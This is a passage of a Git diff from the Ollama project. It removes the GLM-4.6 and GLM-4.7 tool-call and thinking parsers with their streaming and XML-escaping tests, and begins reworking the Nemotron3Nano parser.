-	// Wrap the content in a root element to make it valid XML
-	xmlString := "<tool_call>" + escaped + "</tool_call>"
-
-	// Parse XML into struct
-	var parsed GLMToolCallXML
-	if err := xml.Unmarshal([]byte(xmlString), &parsed); err != nil {
-		return api.ToolCall{}, fmt.Errorf("failed to parse XML: %w", err)
-	}
-
-	// Extract and trim function name
-	functionName := strings.TrimSpace(parsed.Content)
-	if functionName == "" {
-		return api.ToolCall{}, fmt.Errorf("empty function name")
-	}
-
-	// Verify keys and values are paired correctly
-	if len(parsed.Keys) != len(parsed.Values) {
-		return api.ToolCall{}, fmt.Errorf("mismatched arg_key and arg_value counts: %d keys, %d values", len(parsed.Keys), len(parsed.Values))
-	}
-
-	// Find the matching tool to get parameter types
-	var matchedTool *api.Tool
-	for i := range tools {
-		if tools[i].Function.Name == functionName {
-			matchedTool = &tools[i]
-			break
-		}
-	}
-
-	// Build arguments map by pairing keys and values
-	toolCall := api.ToolCall{
-		Function: api.ToolCallFunction{
-			Name:      functionName,
-			Arguments: api.NewToolCallFunctionArguments(),
-		},
-	}
-
-	for i := range parsed.Keys {
-		key := strings.TrimSpace(parsed.Keys[i])
-		value := parsed.Values[i] // Don't trim here - parseValue handles it
-
-		// Look up parameter type
-		var paramType api.PropertyType
-		if matchedTool != nil && matchedTool.Function.Parameters.Properties != nil {
-			if prop, ok := matchedTool.Function.Parameters.Properties.Get(key); ok {
-				// Handle anyOf by collecting all types from the union
-				if len(prop.AnyOf) > 0 {
-					for _, anyOfProp := range prop.AnyOf {
-						paramType = append(paramType, anyOfProp.Type...)
-					}
-				} else {
-					paramType = prop.Type
-				}
-			}
-		}
-
-		// Parse value with type coercion
-		toolCall.Function.Arguments.Set(key, parseValue(value, paramType))
-	}
-
-	return toolCall, nil
-}
--- a/model/parsers/glm46_test.go
+++ b/model/parsers/glm46_test.go
@@ -1,862 +0,0 @@
-package parsers
-
-import (
-	"encoding/xml"
-	"reflect"
-	"testing"
-
-	"github.com/ollama/ollama/api"
-)
-
-func TestGLM46ParserStreaming(t *testing.T) {
-	type step struct {
-		input      string
-		wantEvents []glm46Event
-	}
-
-	cases := []struct {
-		desc  string
-		steps []step
-		only  bool
-	}{
-		{
-			desc: "leading whitespace before think tag",
-			steps: []step{
-				{
-					input:      "   \n\t  ",
-					wantEvents: []glm46Event{},
-				},
-				{
-					input:      "<think>thinking</think>",
-					wantEvents: []glm46Event{glm46EventThinkingContent{content: "thinking"}},
-				},
-			},
-		},
-		{
-			desc: "think tag with whitespace inside",
-			steps: []step{
-				{
-					input: "<think>  \n  thinking content  \n  </think>regular content",
-					wantEvents: []glm46Event{
-						glm46EventThinkingContent{content: "thinking content"},
-						glm46EventContent{content: "regular content"},
-					},
-				},
-			},
-		},
-		{
-			desc: "tool call with leading whitespace after opening tag",
-			steps: []step{
-				{
-					input: "<think></think><tool_call>  \n  test  \n  </tool_call>",
-					wantEvents: []glm46Event{
-						glm46EventRawToolCall{raw: "test"},
-					},
-				},
-			},
-		},
-		{
-			desc: "simple thinking then content",
-			steps: []step{
-				{
-					input: "<think>I am thinking</think>Now I respond",
-					wantEvents: []glm46Event{
-						glm46EventThinkingContent{content: "I am thinking"},
-						glm46EventContent{content: "Now I respond"},
-					},
-				},
-			},
-		},
-		{
-			desc: "streamed thinking content",
-			steps: []step{
-				{
-					input:      "<think>hello",
-					wantEvents: []glm46Event{glm46EventThinkingContent{content: "hello"}},
-				},
-				{
-					input:      " world",
-					wantEvents: []glm46Event{glm46EventThinkingContent{content: " world"}},
-				},
-				{
-					input: "</think>content",
-					wantEvents: []glm46Event{
-						glm46EventContent{content: "content"},
-					},
-				},
-			},
-		},
-		{
-			desc: "content before tool call",
-			steps: []step{
-				{
-					input: "<think>Let me call a tool</think>here is text<tool_call>",
-					wantEvents: []glm46Event{
-						glm46EventThinkingContent{content: "Let me call a tool"},
-						glm46EventContent{content: "here is text"},
-					},
-				},
-				{
-					input: "function_name\n<arg_key>param</arg_key>\n<arg_value>value</arg_value>\n</tool_call>",
-					wantEvents: []glm46Event{
-						glm46EventRawToolCall{raw: "function_name\n<arg_key>param</arg_key>\n<arg_value>value</arg_value>"},
-					},
-				},
-			},
-		},
-		{
-			desc: "tool call with content after",
-			steps: []step{
-				{
-					input: "<think>thinking</think><tool_call>test</tool_call>after tool",
-					wantEvents: []glm46Event{
-						glm46EventThinkingContent{content: "thinking"},
-						glm46EventRawToolCall{raw: "test"},
-						glm46EventContent{content: "after tool"},
-					},
-				},
-			},
-		},
-		{
-			desc: "trailing whitespace between content and tool call is trimmed",
-			steps: []step{
-				{
-					input: "<think>thinking</think>content\n  \t  <tool_call>test</tool_call>",
-					wantEvents: []glm46Event{
-						glm46EventThinkingContent{content: "thinking"},
-						glm46EventContent{content: "content"},
-						glm46EventRawToolCall{raw: "test"},
-					},
-				},
-			},
-		},
-		{
-			desc: "trailing whitespace between tool call and content is trimmed",
-			steps: []step{
-				{
-					input: "<think>think</think><tool_call>test</tool_call>\n\t  after",
-					wantEvents: []glm46Event{
-						glm46EventThinkingContent{content: "think"},
-						glm46EventRawToolCall{raw: "test"},
-						glm46EventContent{content: "after"},
-					},
-				},
-			},
-		},
-		{
-			desc: "split thinking close tag",
-			steps: []step{
-				{
-					input:      "<think>thinking content</th",
-					wantEvents: []glm46Event{glm46EventThinkingContent{content: "thinking content"}},
-				},
-				{
-					input: "ink>after",
-					wantEvents: []glm46Event{
-						glm46EventContent{content: "after"},
-					},
-				},
-			},
-		},
-		{
-			desc: "split thinking open tag",
-			steps: []step{
-				{
-					input:      "  <thi",
-					wantEvents: []glm46Event{},
-				},
-				{
-					input:      "nk>content</think>",
-					wantEvents: []glm46Event{glm46EventThinkingContent{content: "content"}},
-				},
-			},
-		},
-		{
-			desc: "split tool open tag",
-			steps: []step{
-				{
-					input:      "<think>think</think>content<tool",
-					wantEvents: []glm46Event{glm46EventThinkingContent{content: "think"}, glm46EventContent{content: "content"}},
-				},
-				{
-					input:      "_call>inside",
-					wantEvents: []glm46Event{},
-				},
-				{
-					input: "</tool_call>",
-					wantEvents: []glm46Event{
-						glm46EventRawToolCall{raw: "inside"},
-					},
-				},
-			},
-		},
-		{
-			desc: "partial thinking close tag fakeout",
-			steps: []step{
-				{
-					input:      "<think>content</th",
-					wantEvents: []glm46Event{glm46EventThinkingContent{content: "content"}},
-				},
-				{
-					input:      "ought more",
-					wantEvents: []glm46Event{glm46EventThinkingContent{content: "</thought more"}},
-				},
-			},
-		},
-		{
-			desc: "partial thinking open tag fakeout",
-			steps: []step{
-				{
-					input:      "  <thi",
-					wantEvents: []glm46Event{},
-				},
-				{
-					input: "nking is fun",
-					wantEvents: []glm46Event{
-						glm46EventContent{content: "  <thinking is fun"},
-					},
-				},
-			},
-		},
-		{
-			desc: "partial tool open tag fakeout",
-			steps: []step{
-				{
-					input: "<think></think>content\n<tool",
-					wantEvents: []glm46Event{
-						glm46EventContent{content: "content"},
-					},
-				},
-				{
-					input: " fakeout",
-					wantEvents: []glm46Event{
-						glm46EventContent{content: "\n<tool fakeout"},
-					},
-				},
-			},
-		},
-		{
-			desc: "partial tool close tag fakeout",
-			steps: []step{
-				{
-					input:      "<think></think><tool_call>content</tool",
-					wantEvents: []glm46Event{},
-				},
-				{
-					input:      " fakeout",
-					wantEvents: []glm46Event{},
-				},
-				{
-					input: "</tool_call>",
-					wantEvents: []glm46Event{
-						glm46EventRawToolCall{raw: "content</tool fakeout"},
-					},
-				},
-			},
-		},
-		{
-			desc: "empty thinking tag",
-			steps: []step{
-				{
-					input: "<think></think>content here",
-					wantEvents: []glm46Event{
-						glm46EventContent{content: "content here"},
-					},
-				},
-			},
-		},
-		{
-			desc: "multiple tool calls in sequence",
-			steps: []step{
-				{
-					input: "<think>think</think><tool_call>first</tool_call>between<tool_call>second</tool_call>end",
-					wantEvents: []glm46Event{
-						glm46EventThinkingContent{content: "think"},
-						glm46EventRawToolCall{raw: "first"},
-						glm46EventContent{content: "between"},
-						glm46EventRawToolCall{raw: "second"},
-						glm46EventContent{content: "end"},
-					},
-				},
-			},
-		},
-		{
-			desc: "no thinking tag - direct to content",
-			steps: []step{
-				{
-					input: "just content here",
-					wantEvents: []glm46Event{
-						glm46EventContent{content: "just content here"},
-					},
-				},
-			},
-		},
-		{
-			desc: "no thinking tag - skip to content then tool call",
-			steps: []step{
-				{
-					input: "Here's the answer:<tool_call>test</tool_call>done",
-					wantEvents: []glm46Event{
-						glm46EventContent{content: "Here's the answer:"},
-						glm46EventRawToolCall{raw: "test"},
-						glm46EventContent{content: "done"},
-					},
-				},
-			},
-		},
-		{
-			desc: "no thinking tag - whitespace preserved when no tags",
-			steps: []step{
-				{
-					input: "  \n  content with leading whitespace",
-					wantEvents: []glm46Event{
-						glm46EventContent{content: "  \n  content with leading whitespace"},
-					},
-				},
-			},
-		},
-		{
-			desc: "whitespace after think close tag gets eaten",
-			steps: []step{
-				{
-					input: "<think>thinking</think>  \n\t  content",
-					wantEvents: []glm46Event{
-						glm46EventThinkingContent{content: "thinking"},
-						glm46EventContent{content: "content"},
-					},
-				},
-			},
-		},
-		{
-			desc: "whitespace after tool_call close tag gets eaten",
-			steps: []step{
-				{
-					input: "<think></think><tool_call>test</tool_call>  \n\t  content",
-					wantEvents: []glm46Event{
-						glm46EventRawToolCall{raw: "test"},
-						glm46EventContent{content: "content"},
-					},
-				},
-			},
-		},
-		{
-			desc: "thinking content withholds trailing whitespace (single chunk)",
-			steps: []step{
-				{
-					input: "<think>thinking content   ",
-					wantEvents: []glm46Event{
-						glm46EventThinkingContent{content: "thinking content"},
-					},
-				},
-				{
-					input: "</think>after",
-					wantEvents: []glm46Event{
-						glm46EventContent{content: "after"},
-					},
-				},
-			},
-		},
-		{
-			desc: "thinking content withholds trailing whitespace with newlines",
-			steps: []step{
-				{
-					input: "<think>thinking\n\n  ",
-					wantEvents: []glm46Event{
-						glm46EventThinkingContent{content: "thinking"},
-					},
-				},
-				{
-					input: "</think>content",
-					wantEvents: []glm46Event{
-						glm46EventContent{content: "content"},
-					},
-				},
-			},
-		},
-		{
-			desc: "thinking content trailing whitespace emitted when more content arrives",
-			steps: []step{
-				{
-					input: "<think>thinking   ",
-					wantEvents: []glm46Event{
-						glm46EventThinkingContent{content: "thinking"},
-					},
-				},
-				{
-					input: "more thinking",
-					wantEvents: []glm46Event{
-						glm46EventThinkingContent{content: "   more thinking"},
-					},
-				},
-				{
-					input:      "</think>",
-					wantEvents: []glm46Event{},
-				},
-			},
-		},
-		{
-			desc: "thinking content withholds trailing whitespace before partial close tag",
-			steps: []step{
-				{
-					input: "<think>thinking   </th",
-					wantEvents: []glm46Event{
-						glm46EventThinkingContent{content: "thinking"},
-					},
-				},
-				{
-					input: "ink>content",
-					wantEvents: []glm46Event{
-						glm46EventContent{content: "content"},
-					},
-				},
-			},
-		},
-	}
-
-	anyOnlies := false
-	for _, tc := range cases {
-		if tc.only {
-			anyOnlies = true
-		}
-	}
-
-	for _, tc := range cases {
-		if anyOnlies && !tc.only {
-			continue
-		}
-
-		t.Run(tc.desc, func(t *testing.T) {
-			parser := GLM46Parser{}
-
-			for i, step := range tc.steps {
-				parser.buffer.WriteString(step.input)
-				gotEvents := parser.parseEvents()
-
-				if len(gotEvents) == 0 && len(step.wantEvents) == 0 {
-					// avoid deep equal on empty vs. nil slices
-					continue
-				}
-
-				if !reflect.DeepEqual(gotEvents, step.wantEvents) {
-					t.Errorf("step %d: input %q: got events %#v, want %#v", i, step.input, gotEvents, step.wantEvents)
-				}
-			}
-		})
-	}
-}
-
-// TestGLMToolCallXMLOrderPreservation verifies that xml.Unmarshal preserves
-// document order when collecting multiple elements with the same tag name into slices.
-// This is a critical assumption for the GLM-4.6 parser's struct-based approach.
-func TestGLMToolCallXMLOrderPreservation(t *testing.T) {
-	testCases := []struct {
-		name       string
-		xml        string
-		wantKeys   []string
-		wantValues []string
-	}{
-		{
-			name: "alternating keys and values",
-			xml: `<tool_call>
-function_name
-<arg_key>first</arg_key>
-<arg_value>A</arg_value>
-<arg_key>second</arg_key>
-<arg_value>B</arg_value>
-<arg_key>third</arg_key>
-<arg_value>C</arg_value>
-</tool_call>`,
-			wantKeys:   []string{"first", "second", "third"},
-			wantValues: []string{"A", "B", "C"},
-		},
-		{
-			name: "all keys then all values",
-			xml: `<tool_call>
-function_name
-<arg_key>key1</arg_key>
-<arg_key>key2</arg_key>
-<arg_key>key3</arg_key>
-<arg_value>val1</arg_value>
-<arg_value>val2</arg_value>
-<arg_value>val3</arg_value>
-</tool_call>`,
-			wantKeys:   []string{"key1", "key2", "key3"},
-			wantValues: []string{"val1", "val2", "val3"},
-		},
-		{
-			name: "mixed grouping",
-			xml: `<tool_call>
-function_name
-<arg_key>a</arg_key>
-<arg_value>1</arg_value>
-<arg_key>b</arg_key>
-<arg_key>c</arg_key>
-<arg_value>2</arg_value>
-<arg_value>3</arg_value>
-</tool_call>`,
-			wantKeys:   []string{"a", "b", "c"},
-			wantValues: []string{"1", "2", "3"},
-		},
-		{
-			name: "reverse order - all values then all keys",
-			xml: `<tool_call>
-function_name
-<arg_value>X</arg_value>
-<arg_value>Y</arg_value>
-<arg_value>Z</arg_value>
-<arg_key>x</arg_key>
-<arg_key>y</arg_key>
-<arg_key>z</arg_key>
-</tool_call>`,
-			wantKeys:   []string{"x", "y", "z"},
-			wantValues: []string{"X", "Y", "Z"},
-		},
-	}
-
-	for _, tc := range testCases {
-		t.Run(tc.name, func(t *testing.T) {
-			var parsed GLMToolCallXML
-			err := xml.Unmarshal([]byte(tc.xml), &parsed)
-			if err != nil {
-				t.Fatalf("failed to unmarshal XML: %v", err)
-			}
-
-			if !reflect.DeepEqual(parsed.Keys, tc.wantKeys) {
-				t.Errorf("Keys order mismatch:\ngot:  %v\nwant: %v", parsed.Keys, tc.wantKeys)
-			}
-
-			if !reflect.DeepEqual(parsed.Values, tc.wantValues) {
-				t.Errorf("Values order mismatch:\ngot:  %v\nwant: %v", parsed.Values, tc.wantValues)
-			}
-		})
-	}
-}
-
-func TestGLM46ToolCallParsing(t *testing.T) {
-	type testCase struct {
-		name         string
-		rawToolCall  string
-		tools        []api.Tool
-		wantToolCall api.ToolCall
-	}
-
-	cases := []testCase{
-		{
-			name:  "simple tool call",
-			tools: []api.Tool{},
-			rawToolCall: `get-current-weather
-<arg_key>location</arg_key>
-<arg_value>New York, NY</arg_value>
-<arg_key>unit</arg_key>
-<arg_value>celsius</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "get-current-weather",
-					Arguments: args(`{"location": "New York, NY", "unit": "celsius"}`),
-				},
-			},
-		},
-		{
-			name: "tool call with typed parameters",
-			tools: []api.Tool{
-				tool("calculate", map[string]api.ToolProperty{
-					"x":       {Type: api.PropertyType{"number"}},
-					"y":       {Type: api.PropertyType{"integer"}},
-					"enabled": {Type: api.PropertyType{"boolean"}},
-					"items":   {Type: api.PropertyType{"array"}},
-				}),
-			},
-			rawToolCall: `calculate
-<arg_key>x</arg_key>
-<arg_value>3.14</arg_value>
-<arg_key>y</arg_key>
-<arg_value>42</arg_value>
-<arg_key>enabled</arg_key>
-<arg_value>true</arg_value>
-<arg_key>items</arg_key>
-<arg_value>["a", "b", "c"]</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "calculate",
-					Arguments: args(`{"enabled": true, "items": ["a", "b", "c"], "x": 3.14, "y": 42}`),
-				},
-			},
-		},
-		{
-			name:  "function name with whitespace",
-			tools: []api.Tool{},
-			rawToolCall: `  get-weather
-<arg_key>city</arg_key>
-<arg_value>Paris</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "get-weather",
-					Arguments: args(`{"city": "Paris"}`),
-				},
-			},
-		},
-		{
-			name:  "values with special characters",
-			tools: []api.Tool{},
-			rawToolCall: `execute-command
-<arg_key>command</arg_key>
-<arg_value>ls && echo "done"</arg_value>
-<arg_key>message</arg_key>
-<arg_value>a < b and c > d</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "execute-command",
-					Arguments: args(`{"command": "ls && echo \"done\"", "message": "a < b and c > d"}`),
-				},
-			},
-		},
-		{
-			name:  "unicode in function names and values",
-			tools: []api.Tool{},
-			rawToolCall: `获取天气
-<arg_key>城市</arg_key>
-<arg_value>北京</arg_value>
-<arg_key>message</arg_key>
-<arg_value>Hello! 你好! 🌟</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "获取天气",
-					Arguments: args(`{"message": "Hello! 你好! 🌟", "城市": "北京"}`),
-				},
-			},
-		},
-		{
-			name:  "empty value",
-			tools: []api.Tool{},
-			rawToolCall: `test-function
-<arg_key>param1</arg_key>
-<arg_value></arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "test-function",
-					Arguments: args(`{"param1": ""}`),
-				},
-			},
-		},
-		{
-			name:  "special chars in arg_key names",
-			tools: []api.Tool{},
-			rawToolCall: `test-function
-<arg_key>param<1></arg_key>
-<arg_value>value1</arg_value>
-<arg_key>a&b</arg_key>
-<arg_value>value2</arg_value>
-<arg_key>x>y</arg_key>
-<arg_value>value3</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "test-function",
-					Arguments: args(`{"a&b": "value2", "param<1>": "value1", "x>y": "value3"}`),
-				},
-			},
-		},
-		{
-			name:  "multiple consecutive ampersands",
-			tools: []api.Tool{},
-			rawToolCall: `test-function
-<arg_key>param</arg_key>
-<arg_value>test &&&& more</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "test-function",
-					Arguments: args(`{"param": "test &&&& more"}`),
-				},
-			},
-		},
-		{
-			name:  "mixed special chars together",
-			tools: []api.Tool{},
-			rawToolCall: `test-function
-<arg_key>param</arg_key>
-<arg_value><>&<>&</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "test-function",
-					Arguments: args(`{"param": "<>&<>&"}`),
-				},
-			},
-		},
-		{
-			name:  "newlines and tabs in parameter values",
-			tools: []api.Tool{},
-			rawToolCall: `test-function
-<arg_key>multiline</arg_key>
-<arg_value>line1
-	indented line2
-line3</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "test-function",
-					Arguments: args(`{"multiline": "line1\n\tindented line2\nline3"}`),
-				},
-			},
-		},
-		{
-			name:  "single and double quotes in values",
-			tools: []api.Tool{},
-			rawToolCall: `test-function
-<arg_key>quotes</arg_key>
-<arg_value>She said "Hello's there!"</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "test-function",
-					Arguments: args(`{"quotes": "She said \"Hello's there!\""}`),
-				},
-			},
-		},
-		{
-			name:  "CDATA-like content that should be treated as text",
-			tools: []api.Tool{},
-			rawToolCall: `test-function
-<arg_key>cdata</arg_key>
-<arg_value><![CDATA[not actual cdata]]></arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "test-function",
-					Arguments: args(`{"cdata": "<![CDATA[not actual cdata]]>"}`),
-				},
-			},
-		},
-		{
-			name:  "all special XML entities",
-			tools: []api.Tool{},
-			rawToolCall: `test-function
-<arg_key>entities</arg_key>
-<arg_value>&lt;&gt;&amp;&apos;&quot;</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "test-function",
-					Arguments: args(`{"entities": "&lt;&gt;&amp;&apos;&quot;"}`),
-				},
-			},
-		},
-		{
-			name:  "order preservation with multiple parameters",
-			tools: []api.Tool{},
-			rawToolCall: `test-function
-<arg_key>first</arg_key>
-<arg_value>value1</arg_value>
-<arg_key>second</arg_key>
-<arg_value>value2</arg_value>
-<arg_key>third</arg_key>
-<arg_value>value3</arg_value>
-<arg_key>fourth</arg_key>
-<arg_value>value4</arg_value>
-<arg_key>fifth</arg_key>
-<arg_value>value5</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "test-function",
-					Arguments: args(`{"fifth": "value5", "first": "value1", "fourth": "value4", "second": "value2", "third": "value3"}`),
-				},
-			},
-		},
-		{
-			name:  "order preservation with identical key names but different positions",
-			tools: []api.Tool{},
-			rawToolCall: `test-function
-<arg_key>param</arg_key>
-<arg_value>first occurrence</arg_value>
-<arg_key>other</arg_key>
-<arg_value>middle</arg_value>
-<arg_key>param</arg_key>
-<arg_value>second occurrence</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name: "test-function",
-					// Later occurrence should overwrite earlier one
-					Arguments: args(`{"other": "middle", "param": "second occurrence"}`),
-				},
-			},
-		},
-		{
-			name: "array with mixed types",
-			tools: []api.Tool{
-				tool("process", map[string]api.ToolProperty{
-					"items": {Type: api.PropertyType{"array"}},
-				}),
-			},
-			rawToolCall: `process
-<arg_key>items</arg_key>
-<arg_value>[1, "hello", true, null]</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "process",
-					Arguments: args(`{"items": [1, "hello", true, null]}`),
-				},
-			},
-		},
-		{
-			name: "empty array",
-			tools: []api.Tool{
-				tool("test", map[string]api.ToolProperty{
-					"tags": {Type: api.PropertyType{"array"}},
-				}),
-			},
-			rawToolCall: `test
-<arg_key>tags</arg_key>
-<arg_value>[]</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "test",
-					Arguments: args(`{"tags": []}`),
-				},
-			},
-		},
-		{
-			name: "anyOf array or string - with array of objects",
-			tools: []api.Tool{
-				tool("TodoWrite", map[string]api.ToolProperty{
-					"todos": {AnyOf: []api.ToolProperty{{Type: api.PropertyType{"array"}}, {Type: api.PropertyType{"string"}}}},
-				}),
-			},
-			// <tool_call>TodoWrite
-			// <arg_key>todos</arg_key>
-			// <arg_value>[{"content": "Set up HTML file and basic structure", "id": "1", "priority": "high", "status": "pending"}, {"content": "Create 3D scene with Three.js", "id": "2", "priority": "high", "status": "pending"}, {"content": "Implement terrain generation with blocks", "id": "3", "priority": "high", "status": "pending"}, {"content": "Add player controls (movement, camera)", "id": "4", "priority": "high", "status": "pending"}, {"content": "Implement block placement/destruction", "id": "5", "priority": "medium", "status": "pending"}, {"content": "Add lighting and textures", "id": "6", "priority": "medium", "status": "pending"}, {"content": "Test and optimize performance", "id": "7", "priority": "low", "status": "pending"}]</arg_value>
-			// </tool_call>
-			rawToolCall: `TodoWrite
-<arg_key>todos</arg_key>
-<arg_value>[{"content": "task 1", "status": "pending", "priority": "high", "id": "1"}, {"content": "task 2", "status": "completed", "priority": "low", "id": "2"}]</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "TodoWrite",
-					Arguments: args(`{"todos": [{"content": "task 1", "id": "1", "priority": "high", "status": "pending"}, {"content": "task 2", "id": "2", "priority": "low", "status": "completed"}]}`),
-				},
-			},
-		},
-		{
-			name: "anyOf array or string - with plain string",
-			tools: []api.Tool{
-				tool("TodoWrite", map[string]api.ToolProperty{
-					"todos": {Type: api.PropertyType{"array", "string"}},
-				}),
-			},
-			rawToolCall: `TodoWrite
-<arg_key>todos</arg_key>
-<arg_value>Error: could not load todos</arg_value>`,
-			wantToolCall: api.ToolCall{
-				Function: api.ToolCallFunction{
-					Name:      "TodoWrite",
-					Arguments: args(`{"todos": "Error: could not load todos"}`),
-				},
-			},
-		},
-	}
-
-	for i, tc := range cases {
-		t.Run(tc.name, func(t *testing.T) {
-			gotToolCall, err := parseGLM46ToolCall(glm46EventRawToolCall{raw: tc.rawToolCall}, tc.tools)
-			if err != nil {
-				t.Errorf("case %d (%s): %v", i, tc.name, err)
-			}
-			if !toolCallEqual(gotToolCall, tc.wantToolCall) {
-				t.Errorf("case %d (%s): got tool call %#v, want %#v", i, tc.name, gotToolCall, tc.wantToolCall)
-			}
-		})
-	}
-}
--- a/model/parsers/glm47.go
+++ b/model/parsers/glm47.go
@@ -1,20 +0,0 @@
-package parsers
-
-import "github.com/ollama/ollama/api"
-
-// GLM47Parser extends GLM46Parser with thinking-aware initialization.
-// GLM-4.7's prompt ends with <think> when thinking is enabled, so the parser
-// must start in CollectingThinking state (the model outputs thinking content directly).
-type GLM47Parser struct {
-	GLM46Parser
-}
-
-func (p *GLM47Parser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool {
-	p.tools = tools
-	// When thinking is enabled (nil or true), the prompt ends with <think>,
-	// so model output starts directly with thinking content (no opening tag).
-	if thinkValue == nil || thinkValue.Bool() {
-		p.state = glm46ParserState_CollectingThinking
-	}
-	return tools
-}
--- a/model/parsers/glm47_test.go
+++ b/model/parsers/glm47_test.go
@@ -1,99 +0,0 @@
-package parsers
-
-import (
-	"reflect"
-	"testing"
-
-	"github.com/ollama/ollama/api"
-)
-
-func TestGLM47ParserAdd(t *testing.T) {
-	parser := GLM47Parser{}
-	parser.Init([]api.Tool{
-		tool("calculate", map[string]api.ToolProperty{
-			"count":   {Type: api.PropertyType{"integer"}},
-			"enabled": {Type: api.PropertyType{"boolean"}},
-		}),
-	}, nil, nil)
-
-	// When thinking is enabled (thinkValue nil), the prompt ends with <think>,
-	// so the model output does NOT include the opening <think> tag.
-	content, thinking, calls, err := parser.Add("plan</think>Answer<tool_call>calculate<arg_key>count</arg_key><arg_value>3</arg_value><arg_key>enabled</arg_key><arg_value>true</arg_value></tool_call>", true)
-	if err != nil {
-		t.Fatalf("parse failed: %v", err)
-	}
-	if thinking != "plan" {
-		t.Fatalf("expected thinking 'plan', got %q", thinking)
-	}
-	if content != "Answer" {
-		t.Fatalf("expected content 'Answer', got %q", content)
-	}
-	if len(calls) != 1 {
-		t.Fatalf("expected 1 tool call, got %d", len(calls))
-	}
-	expectedArgs := args(`{"count": 3, "enabled": true}`)
-	if !toolCallEqual(api.ToolCall{Function: api.ToolCallFunction{Arguments: calls[0].Function.Arguments}}, api.ToolCall{Function: api.ToolCallFunction{Arguments: expectedArgs}}) {
-		t.Fatalf("expected args %#v, got %#v", expectedArgs.ToMap(), calls[0].Function.Arguments.ToMap())
-	}
-}
-
-func TestGLM47ParserNoThinkingContent(t *testing.T) {
-	parser := GLM47Parser{}
-	parser.Init(nil, nil, nil)
-
-	// When thinking is enabled but model has no thinking to output,
-	// it should output </think> immediately followed by content.
-	content, thinking, calls, err := parser.Add("</think>Plain answer", true)
-	if err != nil {
-		t.Fatalf("parse failed: %v", err)
-	}
-	if thinking != "" {
-		t.Fatalf("expected empty thinking, got %q", thinking)
-	}
-	if content != "Plain answer" {
-		t.Fatalf("expected content 'Plain answer', got %q", content)
-	}
-	if len(calls) != 0 {
-		t.Fatalf("expected no tool calls, got %d", len(calls))
-	}
-}
-
-func TestGLM47ParserThinkingDisabled(t *testing.T) {
-	parser := GLM47Parser{}
-	// When thinking is disabled, parser stays in LookingForThinkingOpen state
-	parser.Init(nil, nil, &api.ThinkValue{Value: false})
-
-	// Model outputs plain content (prompt ended with </think>)
-	content, thinking, calls, err := parser.Add("Plain answer", true)
-	if err != nil {
-		t.Fatalf("parse failed: %v", err)
-	}
-	if thinking != "" {
-		t.Fatalf("expected empty thinking, got %q", thinking)
-	}
-	if content != "Plain answer" {
-		t.Fatalf("expected content 'Plain answer', got %q", content)
-	}
-	if len(calls) != 0 {
-		t.Fatalf("expected no tool calls, got %d", len(calls))
-	}
-}
-
-func TestGLM47ParserToolCallEscaping(t *testing.T) {
-	toolCall, err := parseGLM46ToolCall(glm46EventRawToolCall{raw: `exec
-<arg_key>expr</arg_key>
-<arg_value>a < b && c > d</arg_value>`}, nil)
-	if err != nil {
-		t.Fatalf("parse failed: %v", err)
-	}
-
-	expected := api.ToolCall{
-		Function: api.ToolCallFunction{
-			Name:      "exec",
-			Arguments: args(`{"expr": "a < b && c > d"}`),
-		},
-	}
-	if !reflect.DeepEqual(toolCall, expected) {
-		t.Fatalf("expected %#v, got %#v", expected, toolCall)
-	}
-}
--- a/model/parsers/nemotron3nano.go
+++ b/model/parsers/nemotron3nano.go
@@ -1,6 +1,7 @@
 package parsers

 import (
+	"regexp"
 	"strings"
 	"unicode"

@@ -13,114 +14,243 @@ const (
 	Nemotron3NanoCollectingThinking Nemotron3NanoParserState = iota
 	Nemotron3NanoSkipWhitespaceAfterThinking
 	Nemotron3NanoCollectingContent
+	Nemotron3NanoCollectingToolCalls
 )

 const (
-	nemotronThinkClose   = "</think>"
-	nemotronToolCallOpen = "<tool_call>"
+	nemotronThinkClose    = "</think>"
+	nemotronToolCallOpen  = "<tool_call>"
+	nemotronToolCallClose = "</tool_call>"
 )

 type Nemotron3NanoParser struct {
-	state      Nemotron3NanoParserState
-	buffer     strings.Builder
-	toolParser *Qwen3CoderParser
+	state  Nemotron3NanoParserState
+	buffer strings.Builder
+	tools  []api.Tool
 }

 func (p *Nemotron3NanoParser) HasToolSupport() bool     { return true }
 func (p *Nemotron3NanoParser) HasThinkingSupport() bool { return true }

 func (p *Nemotron3NanoParser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool {
-	p.toolParser = &Qwen3CoderParser{}
-	p.toolParser.Init(tools, nil, nil)
+	p.tools = tools

+	// thinking is enabled if user requests it
 	thinkingEnabled := thinkValue != nil && thinkValue.Bool()
+
 	prefill := lastMessage != nil && lastMessage.Role == "assistant"

-	if !thinkingEnabled || (prefill && lastMessage.Content != "") {
+	if !thinkingEnabled {
 		p.state = Nemotron3NanoCollectingContent
-	} else {
